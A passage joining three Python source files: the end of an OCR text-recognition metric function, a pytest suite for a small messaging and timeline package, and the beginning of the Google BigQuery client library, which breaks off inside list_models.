pred_text_lower_ignore, gt_text_lower_ignore)
match_res['true_positive_char_num'] += true_positive_char_num
normalized_edit_distance = norm_ed_sum / max(1, len(gt_texts))
match_res['ned'] = normalized_edit_distance
return match_res
def eval_ocr_metric(pred_texts, gt_texts):
"""Evaluate the text recognition performance with metric: word accuracy and
1-N.E.D. See https://rrc.cvc.uab.es/?ch=14&com=tasks for details.
Args:
pred_texts (list[str]): Text strings of prediction.
gt_texts (list[str]): Text strings of ground truth.
Returns:
eval_res (dict[str: float]): Metric dict for text recognition, include:
- word_acc: Accuracy in word level.
- word_acc_ignore_case: Accuracy in word level, ignore letter case.
- word_acc_ignore_case_symbol: Accuracy in word level, ignore
letter case and symbol. (default metric for
academic evaluation)
- char_recall: Recall in character level, ignore
letter case and symbol.
- char_precision: Precision in character level, ignore
letter case and symbol.
- 1-N.E.D: 1 - normalized_edit_distance.
"""
assert isinstance(pred_texts, list)
assert isinstance(gt_texts, list)
assert len(pred_texts) == len(gt_texts)
match_res = count_matches(pred_texts, gt_texts)
eps = 1e-8
char_recall = 1.0 * match_res['true_positive_char_num'] / (
eps + match_res['gt_char_num'])
char_precision = 1.0 * match_res['true_positive_char_num'] / (
eps + match_res['pred_char_num'])
word_acc = 1.0 * match_res['match_word_num'] / (
eps + match_res['gt_word_num'])
word_acc_ignore_case = 1.0 * match_res['match_word_ignore_case'] / (
eps + match_res['gt_word_num'])
word_acc_ignore_case_symbol = 1.0 * match_res[
'match_word_ignore_case_symbol'] / (
eps + match_res['gt_word_num'])
eval_res = {}
eval_res['word_acc'] = word_acc
eval_res['word_acc_ignore_case'] = word_acc_ignore_case
eval_res['word_acc_ignore_case_symbol'] = word_acc_ignore_case_symbol
eval_res['char_recall'] = char_recall
eval_res['char_precision'] = char_precision
eval_res['1-N.E.D'] = 1.0 - match_res['ned']
for key, value in eval_res.items():
eval_res[key] = float('{:.4f}'.format(value))
return eval_res
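# --- Hedged usage sketch (added for illustration; not part of the original
# module). The strings are made-up: one of the two words matches exactly, so
# word_acc is 0.5, while the single wrong character in 'w0rld' brings the
# char-level recall and precision down to 0.9.
if __name__ == '__main__':
    predictions = ['hello', 'w0rld']
    ground_truths = ['hello', 'world']
    print(eval_ocr_metric(predictions, ground_truths))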
|
the-stack_106_16855
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `temp` package."""
import datetime
import pytest
import random
from click.testing import CliRunner
from temp import cli
from temp import temp
@pytest.fixture
def response():
"""Sample pytest fixture.
See more at: http://doc.pytest.org/en/latest/fixture.html
"""
# import requests
# return requests.get('https://github.com/audreyr/cookiecutter-pypackage')
def test_content(response):
"""Sample pytest test function with the pytest fixture as an argument."""
# from bs4 import BeautifulSoup
# assert 'GitHub' in BeautifulSoup(response.content).title.string
def test_command_line_interface():
"""Test the CLI."""
runner = CliRunner()
result = runner.invoke(cli.main)
assert result.exit_code == 0
assert 'temp.cli.main' in result.output
help_result = runner.invoke(cli.main, ['--help'])
assert help_result.exit_code == 0
assert '--help Show this message and exit.' in help_result.output
def test_adding_user():
new_user = temp.User().create()
assert temp.Storage().users[new_user.uuid] == new_user
def test_adding_one_follower():
user1 = temp.User().create()
user2 = temp.User().create()
user1.subscribe_to(user2)
assert temp.Storage().subscription_list[user1.uuid] == {user2.uuid, }
assert temp.Storage().followers_back_list[user2.uuid] == {user1.uuid, }
def test_adding_two_followers():
user1 = temp.User().create()
user2 = temp.User().create()
user3 = temp.User().create()
user1.subscribe_to(user2)
user1.subscribe_to(user3)
assert temp.Storage().subscription_list[user1.uuid] == {user2.uuid, user3.uuid}
assert temp.Storage().followers_back_list[user2.uuid] == {user1.uuid, }
assert temp.Storage().followers_back_list[user3.uuid] == {user1.uuid, }
class TestSuperRichData:
@classmethod
def teardown_class(cls):
"""Runs at end of class"""
temp.Storage().clear()
@classmethod
def setup_class(cls):
"""Runs once per class"""
cls.total_number_of_messages = 1000
cls.user1 = temp.User().create()
cls.user2 = temp.User().create()
cls.user3 = temp.User().create()
cls.user1.subscribe_to(cls.user2)
cls.user1.subscribe_to(cls.user3)
for i in range(cls.total_number_of_messages):
user = random.choice([cls.user1, cls.user2, cls.user3])
in_reply_user = random.choice([None, None, None, cls.user1, cls.user2, cls.user3])
text = temp.generate_uuid()[0:8]
if in_reply_user:
try:
in_reply_message = random.choice(temp.Storage.messages_by_users[in_reply_user.uuid])
except AttributeError:
in_reply_message = None
else:
in_reply_message = None
message = temp.Message(user=user, body=text, in_reply_to=in_reply_message)
message.created = message.created + datetime.timedelta(seconds=i) + datetime.timedelta(
seconds=random.choice([-5, 5]))
message.post()
def test_total_number_of_messages(self):
assert len(temp.Storage().messages_list) == self.total_number_of_messages
def test_timeline_subscribed_to_zero(self):
assert temp.Timeline().generate_timeline(self.user2) == []
assert temp.Timeline().generate_timeline(self.user3) == []
def test_timeline_for_one_followers1(self):
assert len(temp.Timeline().generate_timeline(self.user2)) <= 50
def test_timeline_for_one_followers2(self):
assert len(temp.Timeline().generate_timeline(self.user3)) <= 50
def test_timeline_for_different_k(self):
max_k = len(temp.Timeline().generate_timeline(self.user3))
print("We generated maximum of %s messages" % max_k)
for k in range(0, max_k):
print("Test for %s timeline limit" % k)
assert len(temp.Timeline().generate_timeline(self.user3, k_limit=k)) == k
class TestHandmadeData:
@classmethod
def teardown_class(cls):
"""Runs at end of class"""
temp.Storage().clear()
@classmethod
def setup_class(cls):
"""Runs once per class"""
cls.user1 = temp.User().create()
cls.user2 = temp.User().create()
cls.user3 = temp.User().create()
cls.user1.subscribe_to(cls.user2)
cls.user1.subscribe_to(cls.user3)
cls.message1 = temp.Message(cls.user1, "M1: Body 1", in_reply_to=None)
cls.message1.post()
cls.message2 = temp.Message(cls.user2, "M2: In reply to M1 from first user", in_reply_to=cls.message1.uuid)
cls.message2.created = cls.message2.created + datetime.timedelta(seconds=2)
cls.message2.post()
cls.message3 = temp.Message(cls.user2, "M3: Second reply to first user message", in_reply_to=cls.message1.uuid)
cls.message3.created = cls.message3.created + datetime.timedelta(seconds=3)
cls.message3.post()
def test_message_name(self):
assert str(self.message1) == \
'({}: {} at {:%m:%S}, {})'.format(
self.message1.author[0:5], self.message1.body, self.message1.created, self.message1.uuid[0:5])
def test_user_connection(self):
assert temp.Storage().subscription_list[self.user1.uuid] == {self.user2.uuid, self.user3.uuid}
assert temp.Storage().subscription_list[self.user2.uuid] == set()
assert temp.Storage().subscription_list[self.user3.uuid] == set()
assert temp.Storage().followers_back_list[self.user2.uuid] == {self.user1.uuid}
assert temp.Storage().followers_back_list[self.user3.uuid] == {self.user1.uuid}
def test_create_messages(self):
assert temp.Storage().messages_list[self.message1.uuid] == self.message1
assert temp.Storage().messages_list[self.message2.uuid] == self.message2
assert temp.Storage().messages_list[self.message3.uuid] == self.message3
def test_create_messages_in_reply(self):
assert temp.Storage().messages_by_users[self.user1.uuid] == [self.message1.uuid, self.message2.uuid,
self.message3.uuid]
assert temp.Storage().messages_by_users[self.user2.uuid] == [self.message2.uuid, self.message3.uuid]
def test_timeline_for_zero_followed(self):
assert temp.Timeline().generate_timeline(self.user2) == []
assert temp.Timeline().generate_timeline(self.user3) == []
assert temp.Messaging().timeline(self.user2) == []
assert temp.Messaging().timeline(self.user3) == []
def test_timeline_for_two_followed(self):
assert temp.Timeline().generate_timeline(self.user1) == [self.message3, self.message2]
assert temp.Messaging().timeline(self.user1) == [self.message3, self.message2]
def test_get_wrong_uuid(self):
with pytest.raises(AttributeError):
temp.User().get(temp.generate_uuid())
def test_biased_in_reply_message(self):
fake_message_object = temp.Message(self.user1, "")
message_fake = temp.Message(self.user1, "Second in reply to 1", in_reply_to=fake_message_object.uuid)
        with pytest.raises(AttributeError, message="Linked message by \"in_reply\" does not exist"):
message_fake.post()
def test_biased_in_user_message(self):
fake_message_object = temp.Message(self.user1, "")
fake_message_object.author = temp.generate_uuid()
with pytest.raises(AttributeError):
fake_message_object.post()
def test_user_representation(self):
assert str(self.user1) == self.user1.uuid[0:5]
def test_message_order(self):
assert self.message3 > self.message2
class TestMoreMessages(TestHandmadeData):
def test_create_one_message(self):
new_message = temp.Message(self.user2, "M4: In reply to M3", in_reply_to=self.message3.uuid)
new_message.created = new_message.created + datetime.timedelta(seconds=10)
new_message.post()
assert len(temp.Timeline().generate_timeline(self.user1)) == 3
assert len(temp.Timeline().generate_timeline(self.user2)) == 0
assert len(temp.Timeline().generate_timeline(self.user3)) == 0
class TestCircularConnection(TestHandmadeData):
from collections import defaultdict
temp.Storage().subscription_list = defaultdict(set)
temp.Storage().followers_back_list = defaultdict(set)
def test_circular_follow_timeline(self):
# Let's start with following self
self.user2.subscribe_to(self.user2)
assert temp.Timeline().generate_timeline(self.user3) == []
self.user3.subscribe_to(self.user3)
assert temp.Timeline().generate_timeline(self.user3) == []
def test_circular_connection_for_user2(self):
self.user3.subscribe_to(self.user2)
assert len(temp.Timeline().generate_timeline(self.user1)) == 2
assert len(temp.Timeline().generate_timeline(self.user2)) == 0
assert len(temp.Timeline().generate_timeline(self.user3)) == 2
def test_circular_connection_for_user3(self):
self.user3.subscribe_to(self.user1)
self.user3.subscribe_to(self.user2)
assert len(temp.Timeline().generate_timeline(self.user1)) == 2
assert len(temp.Timeline().generate_timeline(self.user2)) == 0
assert len(temp.Timeline().generate_timeline(self.user3)) == 3
def test_case_for_user2(self):
self.user2.subscribe_to(self.user1)
assert len(temp.Timeline().generate_timeline(self.user1)) == 2
assert len(temp.Timeline().generate_timeline(self.user2)) == 1
assert len(temp.Timeline().generate_timeline(self.user3)) == 3
def test_clear(self):
self.user3.subscribe_to(self.user1)
self.user3.subscribe_to(self.user2)
assert len(temp.Timeline().generate_timeline(self.user3)) == 3
class TestAPIOnHandmadeData:
def setup(self):
"""Runs once per class"""
temp.Storage().clear()
self.user1 = temp.User().create()
self.user4 = temp.User().create()
self.message1 = temp.Messaging().post("test", self.user1.uuid)
self.message2 = temp.Messaging().post("test", self.user1.uuid, in_reply_to_uuid=self.message1.uuid)
def test_post(self):
assert self.message1.uuid in temp.Storage().messages_list
assert self.message2.uuid in temp.Storage().messages_list
assert len(temp.Storage().messages_list) == 2
def test_no_follower(self):
assert not any(temp.Storage().subscription_list.values())
assert not any(temp.Storage().followers_back_list.values())
def test_follower(self):
temp.Messaging().follow(who=self.user4.uuid, subscribe_to=self.user1.uuid)
assert self.user1.uuid in temp.Storage().subscription_list[self.user4.uuid]
assert self.user4.uuid in temp.Storage().followers_back_list[self.user1.uuid]
def test_unfollow(self):
temp.Messaging().follow(who=self.user4.uuid, subscribe_to=self.user1.uuid)
temp.Messaging().unfollow(who=self.user4.uuid, subscribe_to=self.user1.uuid)
assert not any(temp.Storage().subscription_list.values())
assert not any(temp.Storage().followers_back_list.values())
|
the-stack_106_16856
|
# Copyright 2015 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Client for interacting with the Google BigQuery API."""
from __future__ import absolute_import
try:
from collections import abc as collections_abc
except ImportError: # Python 2.7
import collections as collections_abc
import functools
import gzip
import io
import json
import os
import tempfile
import uuid
import warnings
try:
import pyarrow
except ImportError: # pragma: NO COVER
pyarrow = None
import six
from google import resumable_media
from google.resumable_media.requests import MultipartUpload
from google.resumable_media.requests import ResumableUpload
import google.api_core.exceptions
from google.api_core import page_iterator
import google.cloud._helpers
from google.cloud import exceptions
from google.cloud.client import ClientWithProject
from google.cloud.bigquery._helpers import _record_field_to_json
from google.cloud.bigquery._helpers import _str_or_none
from google.cloud.bigquery._http import Connection
from google.cloud.bigquery import _pandas_helpers
from google.cloud.bigquery.dataset import Dataset
from google.cloud.bigquery.dataset import DatasetListItem
from google.cloud.bigquery.dataset import DatasetReference
from google.cloud.bigquery import job
from google.cloud.bigquery.model import Model
from google.cloud.bigquery.model import ModelReference
from google.cloud.bigquery.query import _QueryResults
from google.cloud.bigquery.retry import DEFAULT_RETRY
from google.cloud.bigquery.routine import Routine
from google.cloud.bigquery.routine import RoutineReference
from google.cloud.bigquery.schema import SchemaField
from google.cloud.bigquery.table import _table_arg_to_table
from google.cloud.bigquery.table import _table_arg_to_table_ref
from google.cloud.bigquery.table import Table
from google.cloud.bigquery.table import TableListItem
from google.cloud.bigquery.table import TableReference
from google.cloud.bigquery.table import RowIterator
_DEFAULT_CHUNKSIZE = 1048576 # 1024 * 1024 B = 1 MB
_MAX_MULTIPART_SIZE = 5 * 1024 * 1024
_DEFAULT_NUM_RETRIES = 6
_BASE_UPLOAD_TEMPLATE = (
u"https://www.googleapis.com/upload/bigquery/v2/projects/"
u"{project}/jobs?uploadType="
)
_MULTIPART_URL_TEMPLATE = _BASE_UPLOAD_TEMPLATE + u"multipart"
_RESUMABLE_URL_TEMPLATE = _BASE_UPLOAD_TEMPLATE + u"resumable"
_GENERIC_CONTENT_TYPE = u"*/*"
_READ_LESS_THAN_SIZE = (
"Size {:d} was specified but the file-like object only had " "{:d} bytes remaining."
)
_NEED_TABLE_ARGUMENT = (
"The table argument should be a table ID string, Table, or TableReference"
)
class Project(object):
"""Wrapper for resource describing a BigQuery project.
:type project_id: str
:param project_id: Opaque ID of the project
:type numeric_id: int
:param numeric_id: Numeric ID of the project
:type friendly_name: str
:param friendly_name: Display name of the project
"""
def __init__(self, project_id, numeric_id, friendly_name):
self.project_id = project_id
self.numeric_id = numeric_id
self.friendly_name = friendly_name
@classmethod
def from_api_repr(cls, resource):
"""Factory: construct an instance from a resource dict."""
return cls(resource["id"], resource["numericId"], resource["friendlyName"])
class Client(ClientWithProject):
"""Client to bundle configuration needed for API requests.
Args:
project (str):
Project ID for the project which the client acts on behalf of.
Will be passed when creating a dataset / job. If not passed,
falls back to the default inferred from the environment.
credentials (google.auth.credentials.Credentials):
(Optional) The OAuth2 Credentials to use for this client. If not
passed (and if no ``_http`` object is passed), falls back to the
default inferred from the environment.
_http (requests.Session):
(Optional) HTTP object to make requests. Can be any object that
defines ``request()`` with the same interface as
:meth:`requests.Session.request`. If not passed, an ``_http``
object is created that is bound to the ``credentials`` for the
current object.
This parameter should be considered private, and could change in
the future.
location (str):
(Optional) Default location for jobs / datasets / tables.
default_query_job_config (google.cloud.bigquery.job.QueryJobConfig):
(Optional) Default ``QueryJobConfig``.
Will be merged into job configs passed into the ``query`` method.
client_info (google.api_core.client_info.ClientInfo):
The client info used to send a user-agent string along with API
requests. If ``None``, then default info will be used. Generally,
you only need to set this if you're developing your own library
or partner tool.
Raises:
google.auth.exceptions.DefaultCredentialsError:
Raised if ``credentials`` is not specified and the library fails
to acquire default credentials.
"""
SCOPE = (
"https://www.googleapis.com/auth/bigquery",
"https://www.googleapis.com/auth/cloud-platform",
)
"""The scopes required for authenticating as a BigQuery consumer."""
def __init__(
self,
project=None,
credentials=None,
_http=None,
location=None,
default_query_job_config=None,
client_info=None,
):
super(Client, self).__init__(
project=project, credentials=credentials, _http=_http
)
self._connection = Connection(self, client_info=client_info)
self._location = location
self._default_query_job_config = default_query_job_config
@property
def location(self):
"""Default location for jobs / datasets / tables."""
return self._location
def get_service_account_email(self, project=None):
"""Get the email address of the project's BigQuery service account
Note:
This is the service account that BigQuery uses to manage tables
encrypted by a key in KMS.
Args:
project (str, optional):
                Project ID to use for retrieving service account email.
Defaults to the client's project.
Returns:
str: service account email address
Example:
>>> from google.cloud import bigquery
>>> client = bigquery.Client()
>>> client.get_service_account_email()
[email protected]
"""
if project is None:
project = self.project
path = "/projects/%s/serviceAccount" % (project,)
api_response = self._connection.api_request(method="GET", path=path)
return api_response["email"]
def list_projects(self, max_results=None, page_token=None, retry=DEFAULT_RETRY):
"""List projects for the project associated with this client.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/projects/list
:type max_results: int
:param max_results: (Optional) maximum number of projects to return,
If not passed, defaults to a value set by the API.
:type page_token: str
:param page_token:
(Optional) Token representing a cursor into the projects. If
not passed, the API will return the first page of projects.
The token marks the beginning of the iterator to be returned
and the value of the ``page_token`` can be accessed at
``next_page_token`` of the
:class:`~google.api_core.page_iterator.HTTPIterator`.
:type retry: :class:`google.api_core.retry.Retry`
:param retry: (Optional) How to retry the RPC.
:rtype: :class:`~google.api_core.page_iterator.Iterator`
:returns: Iterator of :class:`~google.cloud.bigquery.client.Project`
accessible to the current client.
"""
return page_iterator.HTTPIterator(
client=self,
api_request=functools.partial(self._call_api, retry),
path="/projects",
item_to_value=_item_to_project,
items_key="projects",
page_token=page_token,
max_results=max_results,
)
def list_datasets(
self,
project=None,
include_all=False,
filter=None,
max_results=None,
page_token=None,
retry=DEFAULT_RETRY,
):
"""List datasets for the project associated with this client.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets/list
Args:
project (str):
                Optional. Project ID to use for retrieving datasets. Defaults
to the client's project.
include_all (bool):
Optional. True if results include hidden datasets. Defaults
to False.
filter (str):
Optional. An expression for filtering the results by label.
For syntax, see
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets/list#filter.
max_results (int):
Optional. Maximum number of datasets to return.
page_token (str):
Optional. Token representing a cursor into the datasets. If
not passed, the API will return the first page of datasets.
The token marks the beginning of the iterator to be returned
and the value of the ``page_token`` can be accessed at
``next_page_token`` of the
:class:`~google.api_core.page_iterator.HTTPIterator`.
retry (google.api_core.retry.Retry):
Optional. How to retry the RPC.
Returns:
google.api_core.page_iterator.Iterator:
Iterator of
:class:`~google.cloud.bigquery.dataset.DatasetListItem`.
associated with the project.
"""
extra_params = {}
if project is None:
project = self.project
if include_all:
extra_params["all"] = True
if filter:
# TODO: consider supporting a dict of label -> value for filter,
# and converting it into a string here.
extra_params["filter"] = filter
path = "/projects/%s/datasets" % (project,)
return page_iterator.HTTPIterator(
client=self,
api_request=functools.partial(self._call_api, retry),
path=path,
item_to_value=_item_to_dataset,
items_key="datasets",
page_token=page_token,
max_results=max_results,
extra_params=extra_params,
)
def dataset(self, dataset_id, project=None):
"""Construct a reference to a dataset.
:type dataset_id: str
:param dataset_id: ID of the dataset.
:type project: str
:param project: (Optional) project ID for the dataset (defaults to
the project of the client).
:rtype: :class:`google.cloud.bigquery.dataset.DatasetReference`
:returns: a new ``DatasetReference`` instance
"""
if project is None:
project = self.project
return DatasetReference(project, dataset_id)
def create_dataset(self, dataset, exists_ok=False, retry=DEFAULT_RETRY):
"""API call: create the dataset via a POST request.
See
        https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets/insert
Args:
dataset (Union[ \
:class:`~google.cloud.bigquery.dataset.Dataset`, \
:class:`~google.cloud.bigquery.dataset.DatasetReference`, \
str, \
]):
A :class:`~google.cloud.bigquery.dataset.Dataset` to create.
If ``dataset`` is a reference, an empty dataset is created
with the specified ID and client's default location.
exists_ok (bool):
Defaults to ``False``. If ``True``, ignore "already exists"
errors when creating the dataset.
retry (google.api_core.retry.Retry):
Optional. How to retry the RPC.
Returns:
google.cloud.bigquery.dataset.Dataset:
A new ``Dataset`` returned from the API.
Example:
>>> from google.cloud import bigquery
>>> client = bigquery.Client()
>>> dataset = bigquery.Dataset(client.dataset('my_dataset'))
>>> dataset = client.create_dataset(dataset)
"""
if isinstance(dataset, str):
dataset = DatasetReference.from_string(
dataset, default_project=self.project
)
if isinstance(dataset, DatasetReference):
dataset = Dataset(dataset)
path = "/projects/%s/datasets" % (dataset.project,)
data = dataset.to_api_repr()
if data.get("location") is None and self.location is not None:
data["location"] = self.location
try:
api_response = self._call_api(retry, method="POST", path=path, data=data)
return Dataset.from_api_repr(api_response)
except google.api_core.exceptions.Conflict:
if not exists_ok:
raise
return self.get_dataset(dataset.reference, retry=retry)
def create_routine(self, routine, exists_ok=False, retry=DEFAULT_RETRY):
"""[Beta] Create a routine via a POST request.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/routines/insert
Args:
routine (:class:`~google.cloud.bigquery.routine.Routine`):
A :class:`~google.cloud.bigquery.routine.Routine` to create.
The dataset that the routine belongs to must already exist.
exists_ok (bool):
Defaults to ``False``. If ``True``, ignore "already exists"
errors when creating the routine.
retry (google.api_core.retry.Retry):
Optional. How to retry the RPC.
Returns:
google.cloud.bigquery.routine.Routine:
A new ``Routine`` returned from the service.
"""
reference = routine.reference
path = "/projects/{}/datasets/{}/routines".format(
reference.project, reference.dataset_id
)
resource = routine.to_api_repr()
try:
api_response = self._call_api(
retry, method="POST", path=path, data=resource
)
return Routine.from_api_repr(api_response)
except google.api_core.exceptions.Conflict:
if not exists_ok:
raise
return self.get_routine(routine.reference, retry=retry)
def create_table(self, table, exists_ok=False, retry=DEFAULT_RETRY):
"""API call: create a table via a PUT request
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables/insert
Args:
table (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
A :class:`~google.cloud.bigquery.table.Table` to create.
If ``table`` is a reference, an empty table is created
with the specified ID. The dataset that the table belongs to
must already exist.
exists_ok (bool):
Defaults to ``False``. If ``True``, ignore "already exists"
errors when creating the table.
retry (google.api_core.retry.Retry):
Optional. How to retry the RPC.
Returns:
google.cloud.bigquery.table.Table:
A new ``Table`` returned from the service.
"""
table = _table_arg_to_table(table, default_project=self.project)
path = "/projects/%s/datasets/%s/tables" % (table.project, table.dataset_id)
data = table.to_api_repr()
try:
api_response = self._call_api(retry, method="POST", path=path, data=data)
return Table.from_api_repr(api_response)
except google.api_core.exceptions.Conflict:
if not exists_ok:
raise
return self.get_table(table.reference, retry=retry)
def _call_api(self, retry, **kwargs):
call = functools.partial(self._connection.api_request, **kwargs)
if retry:
call = retry(call)
return call()
def get_dataset(self, dataset_ref, retry=DEFAULT_RETRY):
"""Fetch the dataset referenced by ``dataset_ref``
Args:
dataset_ref (Union[ \
:class:`~google.cloud.bigquery.dataset.DatasetReference`, \
str, \
]):
A reference to the dataset to fetch from the BigQuery API.
If a string is passed in, this method attempts to create a
dataset reference from a string using
:func:`~google.cloud.bigquery.dataset.DatasetReference.from_string`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.dataset.Dataset:
A ``Dataset`` instance.
"""
if isinstance(dataset_ref, str):
dataset_ref = DatasetReference.from_string(
dataset_ref, default_project=self.project
)
api_response = self._call_api(retry, method="GET", path=dataset_ref.path)
return Dataset.from_api_repr(api_response)
def get_model(self, model_ref, retry=DEFAULT_RETRY):
"""[Beta] Fetch the model referenced by ``model_ref``.
Args:
model_ref (Union[ \
:class:`~google.cloud.bigquery.model.ModelReference`, \
str, \
]):
A reference to the model to fetch from the BigQuery API.
If a string is passed in, this method attempts to create a
model reference from a string using
:func:`google.cloud.bigquery.model.ModelReference.from_string`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.model.Model:
A ``Model`` instance.
"""
if isinstance(model_ref, str):
model_ref = ModelReference.from_string(
model_ref, default_project=self.project
)
api_response = self._call_api(retry, method="GET", path=model_ref.path)
return Model.from_api_repr(api_response)
def get_routine(self, routine_ref, retry=DEFAULT_RETRY):
"""[Beta] Get the routine referenced by ``routine_ref``.
Args:
routine_ref (Union[ \
:class:`~google.cloud.bigquery.routine.Routine`, \
:class:`~google.cloud.bigquery.routine.RoutineReference`, \
str, \
]):
A reference to the routine to fetch from the BigQuery API. If
a string is passed in, this method attempts to create a
reference from a string using
:func:`google.cloud.bigquery.routine.RoutineReference.from_string`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the API call.
Returns:
google.cloud.bigquery.routine.Routine:
A ``Routine`` instance.
"""
if isinstance(routine_ref, str):
routine_ref = RoutineReference.from_string(
routine_ref, default_project=self.project
)
api_response = self._call_api(retry, method="GET", path=routine_ref.path)
return Routine.from_api_repr(api_response)
def get_table(self, table, retry=DEFAULT_RETRY):
"""Fetch the table referenced by ``table``.
Args:
table (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
A reference to the table to fetch from the BigQuery API.
If a string is passed in, this method attempts to create a
table reference from a string using
:func:`google.cloud.bigquery.table.TableReference.from_string`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.table.Table:
A ``Table`` instance.
"""
table_ref = _table_arg_to_table_ref(table, default_project=self.project)
api_response = self._call_api(retry, method="GET", path=table_ref.path)
return Table.from_api_repr(api_response)
def update_dataset(self, dataset, fields, retry=DEFAULT_RETRY):
"""Change some fields of a dataset.
Use ``fields`` to specify which fields to update. At least one field
must be provided. If a field is listed in ``fields`` and is ``None`` in
``dataset``, it will be deleted.
If ``dataset.etag`` is not ``None``, the update will only
succeed if the dataset on the server has the same ETag. Thus
reading a dataset with ``get_dataset``, changing its fields,
and then passing it to ``update_dataset`` will ensure that the changes
will only be saved if no modifications to the dataset occurred
since the read.
Args:
dataset (google.cloud.bigquery.dataset.Dataset):
The dataset to update.
fields (Sequence[str]):
The properties of ``dataset`` to change (e.g. "friendly_name").
retry (google.api_core.retry.Retry, optional):
How to retry the RPC.
Returns:
google.cloud.bigquery.dataset.Dataset:
The modified ``Dataset`` instance.
"""
partial = dataset._build_resource(fields)
if dataset.etag is not None:
headers = {"If-Match": dataset.etag}
else:
headers = None
api_response = self._call_api(
retry, method="PATCH", path=dataset.path, data=partial, headers=headers
)
return Dataset.from_api_repr(api_response)
def update_model(self, model, fields, retry=DEFAULT_RETRY):
"""[Beta] Change some fields of a model.
Use ``fields`` to specify which fields to update. At least one field
must be provided. If a field is listed in ``fields`` and is ``None``
in ``model``, the field value will be deleted.
If ``model.etag`` is not ``None``, the update will only succeed if
the model on the server has the same ETag. Thus reading a model with
``get_model``, changing its fields, and then passing it to
``update_model`` will ensure that the changes will only be saved if
no modifications to the model occurred since the read.
Args:
model (google.cloud.bigquery.model.Model): The model to update.
fields (Sequence[str]):
The fields of ``model`` to change, spelled as the Model
properties (e.g. "friendly_name").
retry (google.api_core.retry.Retry):
(Optional) A description of how to retry the API call.
Returns:
google.cloud.bigquery.model.Model:
The model resource returned from the API call.
"""
partial = model._build_resource(fields)
if model.etag:
headers = {"If-Match": model.etag}
else:
headers = None
api_response = self._call_api(
retry, method="PATCH", path=model.path, data=partial, headers=headers
)
return Model.from_api_repr(api_response)
def update_routine(self, routine, fields, retry=DEFAULT_RETRY):
"""[Beta] Change some fields of a routine.
Use ``fields`` to specify which fields to update. At least one field
must be provided. If a field is listed in ``fields`` and is ``None``
in ``routine``, the field value will be deleted.
.. warning::
During beta, partial updates are not supported. You must provide
all fields in the resource.
If :attr:`~google.cloud.bigquery.routine.Routine.etag` is not
``None``, the update will only succeed if the resource on the server
has the same ETag. Thus reading a routine with
:func:`~google.cloud.bigquery.client.Client.get_routine`, changing
its fields, and then passing it to this method will ensure that the
changes will only be saved if no modifications to the resource
occurred since the read.
Args:
routine (google.cloud.bigquery.routine.Routine): The routine to update.
fields (Sequence[str]):
The fields of ``routine`` to change, spelled as the
:class:`~google.cloud.bigquery.routine.Routine` properties
(e.g. ``type_``).
retry (google.api_core.retry.Retry):
(Optional) A description of how to retry the API call.
Returns:
google.cloud.bigquery.routine.Routine:
The routine resource returned from the API call.
"""
partial = routine._build_resource(fields)
if routine.etag:
headers = {"If-Match": routine.etag}
else:
headers = None
# TODO: remove when routines update supports partial requests.
partial["routineReference"] = routine.reference.to_api_repr()
api_response = self._call_api(
retry, method="PUT", path=routine.path, data=partial, headers=headers
)
return Routine.from_api_repr(api_response)
def update_table(self, table, fields, retry=DEFAULT_RETRY):
"""Change some fields of a table.
Use ``fields`` to specify which fields to update. At least one field
must be provided. If a field is listed in ``fields`` and is ``None``
in ``table``, the field value will be deleted.
If ``table.etag`` is not ``None``, the update will only succeed if
the table on the server has the same ETag. Thus reading a table with
``get_table``, changing its fields, and then passing it to
``update_table`` will ensure that the changes will only be saved if
no modifications to the table occurred since the read.
Args:
table (google.cloud.bigquery.table.Table): The table to update.
fields (Sequence[str]):
The fields of ``table`` to change, spelled as the Table
properties (e.g. "friendly_name").
retry (google.api_core.retry.Retry):
(Optional) A description of how to retry the API call.
Returns:
google.cloud.bigquery.table.Table:
The table resource returned from the API call.
"""
partial = table._build_resource(fields)
if table.etag is not None:
headers = {"If-Match": table.etag}
else:
headers = None
api_response = self._call_api(
retry, method="PATCH", path=table.path, data=partial, headers=headers
)
return Table.from_api_repr(api_response)
def list_models(
self, dataset, max_results=None, page_token=None, retry=DEFAULT_RETRY
):
"""[Beta] List models in the dataset.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/models/list
Args:
dataset (Union[ \
:class:`~google.cloud.bigquery.dataset.Dataset`, \
:class:`~google.cloud.bigquery.dataset.DatasetReference`, \
str, \
]):
A reference to the dataset whose models to list from the
BigQuery API. If a string is passed in, this method attempts
to create a dataset reference from a string using
:func:`google.cloud.bigquery.dataset.DatasetReference.from_string`.
max_results (int):
(Optional) Maximum number of models to return. If not passed,
defaults to a value set by the API.
page_token (str):
(Optional) Token representing a cursor into the models. If
not passed, the API will return the first page of models. The
token marks the beginning of the iterator to be returned and
the value of the ``page_token`` can be accessed at
``next_page_token`` of the
:class:`~google.api_core.page_iterator.HTTPIterator`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
google.api_core.page_iterator.Iterator:
Iterator of
:class:`~google.cloud.bigquery.model.Model` contained
within the requested dataset.
"""
if isinstance(dataset, str):
dataset = DatasetReference.from_string(
dataset, default_project=self.project
)
